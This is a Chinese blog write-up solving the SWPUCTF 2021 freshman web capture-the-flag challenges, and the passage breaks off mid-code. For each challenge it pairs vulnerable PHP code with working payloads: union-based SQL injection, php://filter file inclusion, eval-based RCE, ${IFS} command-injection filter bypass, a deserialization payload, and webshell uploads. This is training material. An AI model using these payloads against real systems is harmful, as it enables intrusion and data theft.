NSSCTF-SWPUCTF 2021 新生赛-web-wp_swpuctf 2021新生赛 gift 答案-CSDN博客

本文链接：https://blog.csdn.net/mmmjjjjjj1996/article/details/126940612

这篇博客详细介绍了SWPUCTF 2021新生赛中的一系列Web安全挑战，包括源代码查看、注入、RCE、SQL注入、文件包含、上传漏洞等，通过实例解析了各关卡的解决策略和技巧。

摘要由CSDN通过智能技术生成

SWPUCTF 2021 新生赛

web

[SWPUCTF 2021 新生赛]gift_F12

右键源代码直接看到flag

WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}

[SWPUCTF 2021 新生赛]jicao

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm"){
   
    echo $flag;
}
?>

payload（注意必须是双引号）

GET: ?json={
   "x":"wllm"}
POST: id=wllmNB

[SWPUCTF 2021 新生赛]easy_md5

<?php 
highlight_file(__FILE__);
include 'flag2.php';
if (isset($_GET['name']) && isset($_POST['password'])){
   
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
   
        echo $flag;
    }
    else {
   
        echo "wrong!";
    }
}
else {
   
    echo 'wrong!';
}
?>

md5弱类型，直接上数组比较

GET: ?name[]=1
POST: password[]=2

[SWPUCTF 2021 新生赛]caidao

打开链接http://1.14.71.254:28164/直接显示@eval($_POST['wllm']);

直接上蚁剑连接index.php，在根目录看到flag

[SWPUCTF 2021 新生赛]easyrce

<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url'])){
   
    eval($_GET['url']);
}
?>

没任何过滤，直接上

?url=system("tac /flllllaaaaaaggggggg");

[SWPUCTF 2021 新生赛]easy_sql

?wllm=-1' or 1=1--+  返回正常
?wllm=-1' or 1=2--+  返回异常

存在注入直接搞

判断列数

?wllm=-1' order by 3--+  返回正常
?wllm=-1' order by 4--+  返回异常

说明存在3列

判断哪列可以回显

?wllm=-1' union select 1,2,3--+

得到

Your Login name:2
Your Password:3

说明2和3列都可以回显

?wllm=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

得到表名：

Your Login name:test_tb,users
Your Password:3

使用test_tb表

?wllm=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="test_tb"--+

得到列名：

Your Login name:id,flag
Your Password:3

最后直接爆字段值

?wllm=-1' union select 1,group_concat(flag),3  from test_tb--+

得到flag

Your Login name:NSSCTF{ec4be791-7211-4518-9238-06362ac19443}
Your Password:3

[SWPUCTF 2021 新生赛]include

<?php
ini_set("allow_url_include","on");
header("Content-type: text/html; charset=utf-8");
error_reporting(0);
$file=$_GET['file'];
if(isset($file)){
   
    show_source(__FILE__);
    echo 'flag 在flag.php中';
}else{
   
    echo "传入一个file试试";
}
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
include_once($file);
?>

直接上php伪协议

?file=php://filter/read=convert.base64-encode/resource=flag.php

然后base64解码

//PD9waHANCiRmbGFnPSdOU1NDVEZ7NGVhMWFjZmYtYzA0Mi00OTA2LTgxNzYtYWRmYzI2M2Y5YWM0fSc7
<?php
$flag='NSSCTF{4ea1acff-c042-4906-8176-adfc263f9ac4}';

[SWPUCTF 2021 新生赛]babyrce

 <?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1) 
{
   
    include "../next.php";
}
else
    echo "小饼干最好吃啦！";
?>

在header中增加Cookie: admin=1

响应中看到rasalghul.php，直接访问这个页面

 <?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
   
    $ip=$_GET['url'];
    if(preg_match("/ /", $ip)){
   
        die('nonono');
    }
    $a = shell_exec($ip);
    echo $a;
}
?>

shell_exec直接执行Linux命令，但是空格被过滤了，使用${IFS}绕过

?url=cat${
   IFS}/flllllaaaaaaggggggg

[SWPUCTF 2021 新生赛]ez_unserialize

在源代码中发现存在

<!--
User-agent: *
Disallow: 什么东西呢？
-->

访问robots.txt

User-agent: *
Disallow: /cl45s.php

直接打开php看到代码审计

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{
   

    public $admin;
    public $passwd;

    public function __construct(){
   
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
   
        if($this->admin === "admin" && $this->passwd === "ctf"){
   
            include("flag.php");
            echo $flag;
        }else{
   
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?>

直构造序列化字符串，使其反序列化时触发__destruct魔术方法

<?php
class wllm{
   
    public $admin = "admin";
    public $passwd = "ctf";
}
$a = new wllm();
echo serialize($a); //O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
?>

故最终payload

/cl45s.php?p=O:4:"wllm":2:{
   s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

[SWPUCTF 2021 新生赛]Do_you_know_http

直接打开提示Please use 'WLLM' browser!

很明显需要改UA

User-Agent: WLLM

然后302跳转到a.php，又显示You can only read this at local!

很明显改XFF

X-Forwarded-For: 127.0.0.1

然后302跳转到secretttt.php，打开即看到flag

[SWPUCTF 2021 新生赛]easyupload2.0

直接上传一个一句话的phtml文件即可

蚁剑连接，在flag.php中找到flag

[SWPUCTF 2021 新生赛]no_wakeup

 <?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{
   


        public $admin;
        public $passwd;

        public function __construct(){
   
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
   
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
   
            if($this->admin === "admin" &&a